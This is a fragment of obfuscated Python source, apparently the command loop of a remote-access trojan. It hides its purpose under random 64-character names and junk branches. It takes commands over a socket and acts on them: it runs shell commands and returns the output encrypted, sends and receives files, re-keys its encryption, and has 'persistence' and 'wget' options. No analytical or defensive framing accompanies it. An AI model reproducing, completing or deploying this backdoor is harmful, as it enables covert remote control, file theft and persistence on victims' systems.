DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu, _, gjydbwjOJAzCLnUbmdOxDXJdNCxvhMPgRpoErUpfUlgooWLdjzXISOyoGcWhAtwX = FXRrWAzIHjxZcHYYdcbgaXeaFjAhmzOyaeEJgxiIuyrxhwdbmbSjXjCIeOVCdbGm.partition(' ')
if DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'quit':
HpGnavopgOVDDhjgCJDpsOdZgnJzcmgcBNFcUtIjgAjimXUjuqGZpQBgNasxZSaF = 'VxdoZnhVzziTdiWbbzWXfMLpoAAhMtRxrpwLdEOusNVBFpHogRffDbtFaOJzJQTU'
vfLzoLjTVGckdMsYgBFKSgeqJGloOKIHQfDWjBCjcQDNzNnJyqLOqeYYMYaWxPAw = 'tHplzNRdefucUjtISKlaGRwUWrxNKmWilaRPNjDXAvYRLJvNdEFksMYgWnVtdavW'
vxSDrrZKbJetSBGounvbwctexnmKVxVCiwJSvRPpPpSJIAFZZFsBjXOVzGCPzQCB = 'GbLeyBLfmJzYiQYGVSqpUwMvZMRoZriKpYJwrPngjLWOvZQlvmMIoVpGWavfWexu'
MYYNJyYkUuKJJuJjyJFeyyKYTKklDcgheWKTfAJJuDXmpHEjfHBwMAChtwMxRYQT = 'SzsoVlVrNOoLFTehvpZMpJArWBJKtAoDvCDezkSYGZTUnqJCLfpMDPioVgbIRDqZ'
jkjYMyLEpIJcIPGtmCcvOPxWlslFLmFPBlzNZNZexsaSNPUXXEpkzIINJDPWASDD = 'EkXEWUCxXyvbjGMYUrEGAqapbkZdsCbXkBKvnlsmHPLmkjJUaYxJTvmMtTEjOFAz'
lvxyVYtEpYJrAcyCmSYuVGsMLPmOFZZKfzzHNZVSIhlZzcaRAYsZIbSvqUGueLxF = 'HNgVMceHWAZrWCTNxEjWYISmKawFVPYPBNxTOOuzSNcnbuOYqYSegKYSUIzpUjwv'
if HpGnavopgOVDDhjgCJDpsOdZgnJzcmgcBNFcUtIjgAjimXUjuqGZpQBgNasxZSaF != MYYNJyYkUuKJJuJjyJFeyyKYTKklDcgheWKTfAJJuDXmpHEjfHBwMAChtwMxRYQT:
vfLzoLjTVGckdMsYgBFKSgeqJGloOKIHQfDWjBCjcQDNzNnJyqLOqeYYMYaWxPAw = vxSDrrZKbJetSBGounvbwctexnmKVxVCiwJSvRPpPpSJIAFZZFsBjXOVzGCPzQCB
for lvxyVYtEpYJrAcyCmSYuVGsMLPmOFZZKfzzHNZVSIhlZzcaRAYsZIbSvqUGueLxF in MYYNJyYkUuKJJuJjyJFeyyKYTKklDcgheWKTfAJJuDXmpHEjfHBwMAChtwMxRYQT:
if lvxyVYtEpYJrAcyCmSYuVGsMLPmOFZZKfzzHNZVSIhlZzcaRAYsZIbSvqUGueLxF != vxSDrrZKbJetSBGounvbwctexnmKVxVCiwJSvRPpPpSJIAFZZFsBjXOVzGCPzQCB:
vfLzoLjTVGckdMsYgBFKSgeqJGloOKIHQfDWjBCjcQDNzNnJyqLOqeYYMYaWxPAw = vfLzoLjTVGckdMsYgBFKSgeqJGloOKIHQfDWjBCjcQDNzNnJyqLOqeYYMYaWxPAw
else:
jkjYMyLEpIJcIPGtmCcvOPxWlslFLmFPBlzNZNZexsaSNPUXXEpkzIINJDPWASDD = HpGnavopgOVDDhjgCJDpsOdZgnJzcmgcBNFcUtIjgAjimXUjuqGZpQBgNasxZSaF
else:
vxSDrrZKbJetSBGounvbwctexnmKVxVCiwJSvRPpPpSJIAFZZFsBjXOVzGCPzQCB = HpGnavopgOVDDhjgCJDpsOdZgnJzcmgcBNFcUtIjgAjimXUjuqGZpQBgNasxZSaF
HpGnavopgOVDDhjgCJDpsOdZgnJzcmgcBNFcUtIjgAjimXUjuqGZpQBgNasxZSaF = jkjYMyLEpIJcIPGtmCcvOPxWlslFLmFPBlzNZNZexsaSNPUXXEpkzIINJDPWASDD
if vxSDrrZKbJetSBGounvbwctexnmKVxVCiwJSvRPpPpSJIAFZZFsBjXOVzGCPzQCB == HpGnavopgOVDDhjgCJDpsOdZgnJzcmgcBNFcUtIjgAjimXUjuqGZpQBgNasxZSaF:
for lvxyVYtEpYJrAcyCmSYuVGsMLPmOFZZKfzzHNZVSIhlZzcaRAYsZIbSvqUGueLxF in HpGnavopgOVDDhjgCJDpsOdZgnJzcmgcBNFcUtIjgAjimXUjuqGZpQBgNasxZSaF:
if lvxyVYtEpYJrAcyCmSYuVGsMLPmOFZZKfzzHNZVSIhlZzcaRAYsZIbSvqUGueLxF == vxSDrrZKbJetSBGounvbwctexnmKVxVCiwJSvRPpPpSJIAFZZFsBjXOVzGCPzQCB:
vxSDrrZKbJetSBGounvbwctexnmKVxVCiwJSvRPpPpSJIAFZZFsBjXOVzGCPzQCB = HpGnavopgOVDDhjgCJDpsOdZgnJzcmgcBNFcUtIjgAjimXUjuqGZpQBgNasxZSaF
else:
vxSDrrZKbJetSBGounvbwctexnmKVxVCiwJSvRPpPpSJIAFZZFsBjXOVzGCPzQCB = jkjYMyLEpIJcIPGtmCcvOPxWlslFLmFPBlzNZNZexsaSNPUXXEpkzIINJDPWASDD
gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk.close()
sys.exit(0)
elif DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'run':
YFjLPlYoiRlrvKiMwwMFGXMyRbquKDXKbsMwWqFWKykctficTrBHxYpcKbyUHkDm = 'YvBKYUVhdugDZFWydpafzUyusaNcXHjzhbQSGIDKMeYVsGeDqDKFSsffFPgBnkUx'
ULColqsuyNEAkuDMAldDtXAWZEtwaRmjakspwUeHufQDicEgoUFrYuCIokrAfAvz = 'nkXMKRwCeUgxRNxXxOClxMHuzkkIzlmmNVPkKHhWwkQUouZnuDFspmqBuCXSgbzF'
RISltHawfHazeNmoqeoqGIvqyGQxowflGhgKhkVIrYSkiKWWgEItARnvhMhmOPXz = 'ObwVQlXqRdJKVBLHIFdxbETcibmDxLWjhIdNOQcSWFxyUlTEkeHHXxWKeXRJsjnx'
if YFjLPlYoiRlrvKiMwwMFGXMyRbquKDXKbsMwWqFWKykctficTrBHxYpcKbyUHkDm == ULColqsuyNEAkuDMAldDtXAWZEtwaRmjakspwUeHufQDicEgoUFrYuCIokrAfAvz:
RISltHawfHazeNmoqeoqGIvqyGQxowflGhgKhkVIrYSkiKWWgEItARnvhMhmOPXz = 'ObwVQlXqRdJKVBLHIFdxbETcibmDxLWjhIdNOQcSWFxyUlTEkeHHXxWKeXRJsjnx'
RISltHawfHazeNmoqeoqGIvqyGQxowflGhgKhkVIrYSkiKWWgEItARnvhMhmOPXz = YFjLPlYoiRlrvKiMwwMFGXMyRbquKDXKbsMwWqFWKykctficTrBHxYpcKbyUHkDm
else:
RISltHawfHazeNmoqeoqGIvqyGQxowflGhgKhkVIrYSkiKWWgEItARnvhMhmOPXz = 'ObwVQlXqRdJKVBLHIFdxbETcibmDxLWjhIdNOQcSWFxyUlTEkeHHXxWKeXRJsjnx'
RISltHawfHazeNmoqeoqGIvqyGQxowflGhgKhkVIrYSkiKWWgEItARnvhMhmOPXz = 'YvBKYUVhdugDZFWydpafzUyusaNcXHjzhbQSGIDKMeYVsGeDqDKFSsffFPgBnkUx'
PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak = subprocess.Popen(gjydbwjOJAzCLnUbmdOxDXJdNCxvhMPgRpoErUpfUlgooWLdjzXISOyoGcWhAtwX, shell=True,
BRafQBZPSCscRMQzhfVVAkvFpYSISLyXWGOhodmFdIJFcLmzrbbidhUSBgtiOsbB=subprocess.PIPE, stderr=subprocess.PIPE,
VOEpsaAlxnhWLkrVxOolXHylXZXiQBBlfcbKsrpSHXgdTSBkqVMvCiCnHHGvchLJ=subprocess.PIPE)
PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak = PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak.BRafQBZPSCscRMQzhfVVAkvFpYSISLyXWGOhodmFdIJFcLmzrbbidhUSBgtiOsbB.read() + PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak.stderr.read()
gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk.sendall(AES_encrypt(PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak, wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa))
elif DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'download':
UwKQJQMKYXUlwFuznaNcYycfIzowKZkvLzoRjErFvRMUMhFKYDivdZGsAcMwZcPw = 'sjIjWMrbZgddxLWDwPqVzHyJrgyvPefjIaGfyHHSSspagsvXmnMCHLtPWtXiXmQs'
kavWLdTdVCXoLeAJJYykpVocOHVeaewLsjWzOomnuTfPtjDiycDgJBUgfKpvPUKq = 'VsowsSUdmTjlSZTQlIvNJqHCdavaXaRMOeIMolpIMqbwRJkxEewYfjkOSHmMaUSx'
HNwzDHfDvqyJDLgqjRLbSErnNSIemVELwElSPWIPUUwhHodphFCvmOtEeEKjvKzv = 'KQUzyoDEERvhQKCKtsfxCNPGocVTiyTrsxnNqQkTNJeeERGESQDnperRiOTSSAcG'
if UwKQJQMKYXUlwFuznaNcYycfIzowKZkvLzoRjErFvRMUMhFKYDivdZGsAcMwZcPw == kavWLdTdVCXoLeAJJYykpVocOHVeaewLsjWzOomnuTfPtjDiycDgJBUgfKpvPUKq:
HNwzDHfDvqyJDLgqjRLbSErnNSIemVELwElSPWIPUUwhHodphFCvmOtEeEKjvKzv = 'KQUzyoDEERvhQKCKtsfxCNPGocVTiyTrsxnNqQkTNJeeERGESQDnperRiOTSSAcG'
HNwzDHfDvqyJDLgqjRLbSErnNSIemVELwElSPWIPUUwhHodphFCvmOtEeEKjvKzv = UwKQJQMKYXUlwFuznaNcYycfIzowKZkvLzoRjErFvRMUMhFKYDivdZGsAcMwZcPw
else:
HNwzDHfDvqyJDLgqjRLbSErnNSIemVELwElSPWIPUUwhHodphFCvmOtEeEKjvKzv = 'KQUzyoDEERvhQKCKtsfxCNPGocVTiyTrsxnNqQkTNJeeERGESQDnperRiOTSSAcG'
HNwzDHfDvqyJDLgqjRLbSErnNSIemVELwElSPWIPUUwhHodphFCvmOtEeEKjvKzv = 'sjIjWMrbZgddxLWDwPqVzHyJrgyvPefjIaGfyHHSSspagsvXmnMCHLtPWtXiXmQs'
for OOvSHIAyGjbDDxGzAhwqdhbXRPoTDluhtvyjAgSyMZhbZFYgmVZlXsJzXNjJrASZ in gjydbwjOJAzCLnUbmdOxDXJdNCxvhMPgRpoErUpfUlgooWLdjzXISOyoGcWhAtwX.split():
kxvYGjHIkDKgdAGPrnrgnWRhyuwkiAkzaBpjOXLKzefOSXUNsaxnnULZTZuoGqlK = 'HWiJeijlkSBzUAKLaxfclSkFDaJRFZyczjMrgiJvuIcrNcPncqETIyPjjPmdinyP'
JuzAJQrYSVKrFoQbyeivJqMmhfqWdGOkHOeWqNahyPgEeLfrVVzguWuKHTbovBrH = 'NuvafeqyHVvEhIRcEblMqphNocXIuTSWnTMroCzWOLKsUPcIyoWxYxnGfPMzjROb'
AzrPdnOyjufWrqgTgYmbFlqtGJuSjYmZcatYyOMpCdgYrtqcCsIiiBJslHmFVcnY = 'yIhfqYNXYRQRWTZpnGoMcnbhRQMIdpgGPECmuNeficFRHNPhqzWBeiFXCEEKCtfI'
YYqVojsBfwpKMLHBOPpaHJpDSKDLwkmMFZLhpRYyAWjpVbMEjMgBqTgRIVNBPDfb = 'yntdfZORhKxvAPcPaZaInOQxzgjxOoMUkUcDiKYAveGOklIIslsaEpPIKVQJvyVv'
ciuuzQwkwNPjfUwaWOlmDmXGQIsaVUoOaNHlaEeHYORpQFYmSOJUQxgGbzkMMeoW = 'GseqGILGvoQFcnORZMhQDAAbTaiovLCIHdXubRpQMBhcSIoTCyhLYZuFwRafypqf'
DnTAfJapDESanqKSxnuEeuesYBpUGXwJiruMcwZVSrcJtkYfNjJpFhXdbYfyTQkn = 'sCkIzQlCuLkbQWEQmiTFUiACJehVkheDnZFMNiZNgmPbVMaRYnHvbYKaTxTgsBRB'
AUYaIVsPCZsLDGyGsRJniNDXpXwbEbPEwemStWbPvAtREHqdXYtmaLuYDdWiDNeg = [
'HWiJeijlkSBzUAKLaxfclSkFDaJRFZyczjMrgiJvuIcrNcPncqETIyPjjPmdinyP',
'yIhfqYNXYRQRWTZpnGoMcnbhRQMIdpgGPECmuNeficFRHNPhqzWBeiFXCEEKCtfI',
'GseqGILGvoQFcnORZMhQDAAbTaiovLCIHdXubRpQMBhcSIoTCyhLYZuFwRafypqf',
'ExKVcPNaRwRkrpMLMBvtCbcAuhEzNcEXTBeGyrdRvqhNRyNEzlrmWGeGdiAUXLoR'
]
for kxvYGjHIkDKgdAGPrnrgnWRhyuwkiAkzaBpjOXLKzefOSXUNsaxnnULZTZuoGqlK in DnTAfJapDESanqKSxnuEeuesYBpUGXwJiruMcwZVSrcJtkYfNjJpFhXdbYfyTQkn:
for JuzAJQrYSVKrFoQbyeivJqMmhfqWdGOkHOeWqNahyPgEeLfrVVzguWuKHTbovBrH in AzrPdnOyjufWrqgTgYmbFlqtGJuSjYmZcatYyOMpCdgYrtqcCsIiiBJslHmFVcnY:
if YYqVojsBfwpKMLHBOPpaHJpDSKDLwkmMFZLhpRYyAWjpVbMEjMgBqTgRIVNBPDfb == ciuuzQwkwNPjfUwaWOlmDmXGQIsaVUoOaNHlaEeHYORpQFYmSOJUQxgGbzkMMeoW:
JuzAJQrYSVKrFoQbyeivJqMmhfqWdGOkHOeWqNahyPgEeLfrVVzguWuKHTbovBrH = kxvYGjHIkDKgdAGPrnrgnWRhyuwkiAkzaBpjOXLKzefOSXUNsaxnnULZTZuoGqlK
elif ciuuzQwkwNPjfUwaWOlmDmXGQIsaVUoOaNHlaEeHYORpQFYmSOJUQxgGbzkMMeoW == JuzAJQrYSVKrFoQbyeivJqMmhfqWdGOkHOeWqNahyPgEeLfrVVzguWuKHTbovBrH:
JuzAJQrYSVKrFoQbyeivJqMmhfqWdGOkHOeWqNahyPgEeLfrVVzguWuKHTbovBrH = DnTAfJapDESanqKSxnuEeuesYBpUGXwJiruMcwZVSrcJtkYfNjJpFhXdbYfyTQkn
else:
ciuuzQwkwNPjfUwaWOlmDmXGQIsaVUoOaNHlaEeHYORpQFYmSOJUQxgGbzkMMeoW = DnTAfJapDESanqKSxnuEeuesYBpUGXwJiruMcwZVSrcJtkYfNjJpFhXdbYfyTQkn
for JuzAJQrYSVKrFoQbyeivJqMmhfqWdGOkHOeWqNahyPgEeLfrVVzguWuKHTbovBrH in AUYaIVsPCZsLDGyGsRJniNDXpXwbEbPEwemStWbPvAtREHqdXYtmaLuYDdWiDNeg:
AzrPdnOyjufWrqgTgYmbFlqtGJuSjYmZcatYyOMpCdgYrtqcCsIiiBJslHmFVcnY = JuzAJQrYSVKrFoQbyeivJqMmhfqWdGOkHOeWqNahyPgEeLfrVVzguWuKHTbovBrH
OOvSHIAyGjbDDxGzAhwqdhbXRPoTDluhtvyjAgSyMZhbZFYgmVZlXsJzXNjJrASZ = OOvSHIAyGjbDDxGzAhwqdhbXRPoTDluhtvyjAgSyMZhbZFYgmVZlXsJzXNjJrASZ.strip()
sendfile(gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk, OOvSHIAyGjbDDxGzAhwqdhbXRPoTDluhtvyjAgSyMZhbZFYgmVZlXsJzXNjJrASZ, wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa)
elif DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'upload':
gdPbJydjXYmFoXgyywVZAOnBxUriGNIXHHWBJdytfvTRbYjHsIXcJfwGZokqHKtM = 'xuKZVZAmuSlqshUbEUftswPRcCShBdGFRdANQRWTlxHZBSOVXbdkuRtXIMlZQnOs'
pidUFBICPAwDFAYUVjoZhxDtwprnnXIaovTQYxaXoenhJdFJnpwzZpiTGAcnxOBI = 'IzoiPUtmuTxwvnhzwKBQbrFoSNdzJNtNMDsKObWLOALmydtcqtJFItlymGjgtLVv'
YPyHXcXYSFhCIsgcCilFeVXaTfIRwObCPSiYerqMaltjMtRSvdTZWwvMqwwbPJfa = 'edXUUjdjOoIoNhCRwcVEAbrSsynHGACDhAZWmxazWmmNYIMsJcnswMPSenNmxIjc'
PjPUCGQMcZlTRPcOWatFRaPpwaVHJQNKqcfRecKxfKfRMijhMOfwOVMmwBlsyxxR = 'KhOUmgGpRdecSNXRglUAkechhRDDFOXrQYgLvBOqahPCpfqFWJaPpiLzeGFIehwD'
sxHrHSdvzOrByPhhLwjobLfaoLWwWwTTCDymsHFfreHzOcevgVPLiZQOOwSNBVGX = 'oYVbCjvgznyiVHjRHOtKLLhaebktYoiVNaIXyDzkBOIKaVzopfuCUEayhtTAScSy'
URrlXxDSJWSoRKNXtYsAqGZHpLYmuRBZgZwKFnfmSkHHXushbUAWXGiirXGEulbc = 'wnCYxRcaQheimXxrnSOVWhPTfqlkdBjreYLHVEZluaaNNLmvEERhuLyGZZadwwSO'
ispxXOYxbesixbuHUFFRkQiMzTDLScTHUllZByRwnboGaMVmOsMhVRXcDYTkecIL = [
'xuKZVZAmuSlqshUbEUftswPRcCShBdGFRdANQRWTlxHZBSOVXbdkuRtXIMlZQnOs',
'edXUUjdjOoIoNhCRwcVEAbrSsynHGACDhAZWmxazWmmNYIMsJcnswMPSenNmxIjc',
'oYVbCjvgznyiVHjRHOtKLLhaebktYoiVNaIXyDzkBOIKaVzopfuCUEayhtTAScSy',
'KAOAufsoBuRrcpFMjhlpmbqpinhazTOXHcwieBUdPOOmBkryATqNsUjQjDzoKiXc'
]
for gdPbJydjXYmFoXgyywVZAOnBxUriGNIXHHWBJdytfvTRbYjHsIXcJfwGZokqHKtM in URrlXxDSJWSoRKNXtYsAqGZHpLYmuRBZgZwKFnfmSkHHXushbUAWXGiirXGEulbc:
for pidUFBICPAwDFAYUVjoZhxDtwprnnXIaovTQYxaXoenhJdFJnpwzZpiTGAcnxOBI in YPyHXcXYSFhCIsgcCilFeVXaTfIRwObCPSiYerqMaltjMtRSvdTZWwvMqwwbPJfa:
if PjPUCGQMcZlTRPcOWatFRaPpwaVHJQNKqcfRecKxfKfRMijhMOfwOVMmwBlsyxxR == sxHrHSdvzOrByPhhLwjobLfaoLWwWwTTCDymsHFfreHzOcevgVPLiZQOOwSNBVGX:
pidUFBICPAwDFAYUVjoZhxDtwprnnXIaovTQYxaXoenhJdFJnpwzZpiTGAcnxOBI = gdPbJydjXYmFoXgyywVZAOnBxUriGNIXHHWBJdytfvTRbYjHsIXcJfwGZokqHKtM
elif sxHrHSdvzOrByPhhLwjobLfaoLWwWwTTCDymsHFfreHzOcevgVPLiZQOOwSNBVGX == pidUFBICPAwDFAYUVjoZhxDtwprnnXIaovTQYxaXoenhJdFJnpwzZpiTGAcnxOBI:
pidUFBICPAwDFAYUVjoZhxDtwprnnXIaovTQYxaXoenhJdFJnpwzZpiTGAcnxOBI = URrlXxDSJWSoRKNXtYsAqGZHpLYmuRBZgZwKFnfmSkHHXushbUAWXGiirXGEulbc
else:
sxHrHSdvzOrByPhhLwjobLfaoLWwWwTTCDymsHFfreHzOcevgVPLiZQOOwSNBVGX = URrlXxDSJWSoRKNXtYsAqGZHpLYmuRBZgZwKFnfmSkHHXushbUAWXGiirXGEulbc
for pidUFBICPAwDFAYUVjoZhxDtwprnnXIaovTQYxaXoenhJdFJnpwzZpiTGAcnxOBI in ispxXOYxbesixbuHUFFRkQiMzTDLScTHUllZByRwnboGaMVmOsMhVRXcDYTkecIL:
YPyHXcXYSFhCIsgcCilFeVXaTfIRwObCPSiYerqMaltjMtRSvdTZWwvMqwwbPJfa = pidUFBICPAwDFAYUVjoZhxDtwprnnXIaovTQYxaXoenhJdFJnpwzZpiTGAcnxOBI
for OOvSHIAyGjbDDxGzAhwqdhbXRPoTDluhtvyjAgSyMZhbZFYgmVZlXsJzXNjJrASZ in gjydbwjOJAzCLnUbmdOxDXJdNCxvhMPgRpoErUpfUlgooWLdjzXISOyoGcWhAtwX.split():
JBiSZgnpSEJeZrSwPVKNtoEjTwkPilwXUvqWltixYzSIRTTTVsMImBgHDgsJXSsx = 'IDnNneEwYyWsYeSSMlupkicAAtZXuwNAwQuTxnCPENofDhnpzBHZqTEXEeiBogoI'
YWJEPkoIBpxMAhgvMiWOYCWxxTMihIVCNLHsWAYyiyVKfjXBXDLOWHREWmhqSdin = 'FHKNuAcpDAoNBeCjgqCddmNDRkZwidQxjxfErefpADpNPDWQDDGIrEmgTONQxkzD'
if JBiSZgnpSEJeZrSwPVKNtoEjTwkPilwXUvqWltixYzSIRTTTVsMImBgHDgsJXSsx != YWJEPkoIBpxMAhgvMiWOYCWxxTMihIVCNLHsWAYyiyVKfjXBXDLOWHREWmhqSdin:
JBiSZgnpSEJeZrSwPVKNtoEjTwkPilwXUvqWltixYzSIRTTTVsMImBgHDgsJXSsx = 'FHKNuAcpDAoNBeCjgqCddmNDRkZwidQxjxfErefpADpNPDWQDDGIrEmgTONQxkzD'
YWJEPkoIBpxMAhgvMiWOYCWxxTMihIVCNLHsWAYyiyVKfjXBXDLOWHREWmhqSdin = JBiSZgnpSEJeZrSwPVKNtoEjTwkPilwXUvqWltixYzSIRTTTVsMImBgHDgsJXSsx
JBiSZgnpSEJeZrSwPVKNtoEjTwkPilwXUvqWltixYzSIRTTTVsMImBgHDgsJXSsx = 'IDnNneEwYyWsYeSSMlupkicAAtZXuwNAwQuTxnCPENofDhnpzBHZqTEXEeiBogoI'
OOvSHIAyGjbDDxGzAhwqdhbXRPoTDluhtvyjAgSyMZhbZFYgmVZlXsJzXNjJrASZ = OOvSHIAyGjbDDxGzAhwqdhbXRPoTDluhtvyjAgSyMZhbZFYgmVZlXsJzXNjJrASZ.strip()
recvfile(gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk, OOvSHIAyGjbDDxGzAhwqdhbXRPoTDluhtvyjAgSyMZhbZFYgmVZlXsJzXNjJrASZ, wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa)
elif DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'rekey':
onCpynAuyacwzFjkmlJEXbkDfhwfKOJsuUPzidYiXEKuCXdLbxpjZCRknrdCbLFH = 'xvwcZAnbNDtaaigKSUNkyiWoktSrtkSgwPLYSkCpFMWxEVcphqDadolvplCgQxYq'
xciGCEKSDPccuEkzVWKeIxKmxJfbwONdNEpjKNJUFeKrjNavJUSXEtlmIjOGXWCJ = 'DsQfuzwuNAsybLkWjeiZepuYKIwWMCoIuTcdgbdTFyGqTyslAVmgcaZDxXeHwUEP'
egmZuaKlsbNgRessWdDEjXBnkRZqkEIJsQQGogWyUuZipsjgozjziBhbozIBBXfa = 'ayOXmANzwwAEmcHpENdFFauAYDIwgPJnfbmuwIWMgnUODlVWIgBnAQqallSkuOeY'
CNqqiDEyxJeoAFmGnEUwGWNLrvnzgLgmzKoSvOMivRaHiRlnFGzRHxmjgYDSTOTS = 'vbGnMCSkPeeKEMNNxmoCQNdisqdRmTTzQAbrrUTtCrWIbdJuONxTrvWezJEJqdeN'
okTCMMFGHYzoQRRCeEVsCfGlbtSybHQnEvvRZKZzXJoBauCmQGHHAkvBaQJxOlKA = 'lZnhTFpqoXcRSzIqUxfZAUqEqLYOTyCGDDDaEbcbtThbZGhtGINmUhQuHJzHAnfA'
if onCpynAuyacwzFjkmlJEXbkDfhwfKOJsuUPzidYiXEKuCXdLbxpjZCRknrdCbLFH in xciGCEKSDPccuEkzVWKeIxKmxJfbwONdNEpjKNJUFeKrjNavJUSXEtlmIjOGXWCJ:
onCpynAuyacwzFjkmlJEXbkDfhwfKOJsuUPzidYiXEKuCXdLbxpjZCRknrdCbLFH = okTCMMFGHYzoQRRCeEVsCfGlbtSybHQnEvvRZKZzXJoBauCmQGHHAkvBaQJxOlKA
if xciGCEKSDPccuEkzVWKeIxKmxJfbwONdNEpjKNJUFeKrjNavJUSXEtlmIjOGXWCJ in egmZuaKlsbNgRessWdDEjXBnkRZqkEIJsQQGogWyUuZipsjgozjziBhbozIBBXfa:
xciGCEKSDPccuEkzVWKeIxKmxJfbwONdNEpjKNJUFeKrjNavJUSXEtlmIjOGXWCJ = CNqqiDEyxJeoAFmGnEUwGWNLrvnzgLgmzKoSvOMivRaHiRlnFGzRHxmjgYDSTOTS
elif xciGCEKSDPccuEkzVWKeIxKmxJfbwONdNEpjKNJUFeKrjNavJUSXEtlmIjOGXWCJ in onCpynAuyacwzFjkmlJEXbkDfhwfKOJsuUPzidYiXEKuCXdLbxpjZCRknrdCbLFH:
egmZuaKlsbNgRessWdDEjXBnkRZqkEIJsQQGogWyUuZipsjgozjziBhbozIBBXfa = xciGCEKSDPccuEkzVWKeIxKmxJfbwONdNEpjKNJUFeKrjNavJUSXEtlmIjOGXWCJ
if egmZuaKlsbNgRessWdDEjXBnkRZqkEIJsQQGogWyUuZipsjgozjziBhbozIBBXfa in xciGCEKSDPccuEkzVWKeIxKmxJfbwONdNEpjKNJUFeKrjNavJUSXEtlmIjOGXWCJ:
xciGCEKSDPccuEkzVWKeIxKmxJfbwONdNEpjKNJUFeKrjNavJUSXEtlmIjOGXWCJ = okTCMMFGHYzoQRRCeEVsCfGlbtSybHQnEvvRZKZzXJoBauCmQGHHAkvBaQJxOlKA
wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa = diffiehellman(gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk)
elif DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'persistence':
DZYgFeNTEldMkiUOEJZlezSErunxZTweCnGOhoqYkbcsQxqDFFoBeoFVYiwApblY = 'nmAiABcbjhJYZmbwczFwfMZxpVvGrQQYlskHdrQMXnNnGKwZuwRazbNoAoWucvKe'
qaFBHEMjKkcsvsMwRxvrsVHijlBdWaWLrqczWAHENlVnyAlEcGzWDMOEvnTbUWAy = 'pWgzlmpYwFUFrCTQjAVHryoUBKeUeOQHXPenCIxooFzSClNEHMlJQYKnjbOwBtoH nmAiABcbjhJYZmbwczFwfMZxpVvGrQQYlskHdrQMXnNnGKwZuwRazbNoAoWucvKe'
PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak = run(ifkyjfqMKsCDTTKFljvJpynmzoQOwTIGPtROJfuaHPXOZyRatKVogjTWNRvciIlg)
gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk.send(AES_encrypt(PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak, wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa))
elif DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'wget':
kpKMRjNpRgIbYEwbIYtghxWLHelAttaoelHZZwdTvXaYJexnKvuBRumwtUkrfkcS = 'wRdTrETVNbJswOwDLqEZuInrxmPOFQHijXpzvcwrFVcnPztarZUaoDZTasuUokGq'
bYeCxeFqaJjLVmArGEABZsaaZpiszwnfkMoZlOkdVOOnUctTmPRJQoAJjDSvCYkd = 'UfeAnDTLxugVqukmSVIcHQZELGHNdvewXokQWxBhEJuNJhTAYmWdfsOYchmNYgTv'
hMargkvLtyzIZoANcjvhIxNcjAIxeVDMZwtdQwDpPJJZYHYclMUlcVTMIkIbcNkg = 'YBvKWfmUWfDjJQNilHywwuNgkqzrQKpDcrvrdirHegQKvKSzFqEdQcIPPVySGYVz'
gUiYBJALWmmOuonglVWanTdxRYRjJBSIcDlzJXVXExKaicMUqmjETSyMFtvseQju = 'IvCmdYsSXvmmaBkfxQQUquzGkupkIjlTOkQKhSDypxwFPGSsafxgMIZooTGVUaGK'
RuqumvwrCadVDbWmBgZlZjlOsOgAHIKrNVbsDSrqRjnvitKNOHrydDfyHwEaGAts = 'FKQxbghsBlcyCiotuHNOrEYJoxoBDBuTBPGlWQrpUowDqAKxAtSoVdiCAqdxDUJl'
if kpKMRjNpRgIbYEwbIYtghxWLHelAttaoelHZZwdTvXaYJexnKvuBRumwtUkrfkcS in bYeCxeFqaJjLVmArGEABZsaaZpiszwnfkMoZlOkdVOOnUctTmPRJQoAJjDSvCYkd:
kpKMRjNpRgIbYEwbIYtghxWLHelAttaoelHZZwdTvXaYJexnKvuBRumwtUkrfkcS = RuqumvwrCadVDbWmBgZlZjlOsOgAHIKrNVbsDSrqRjnvitKNOHrydDfyHwEaGAts
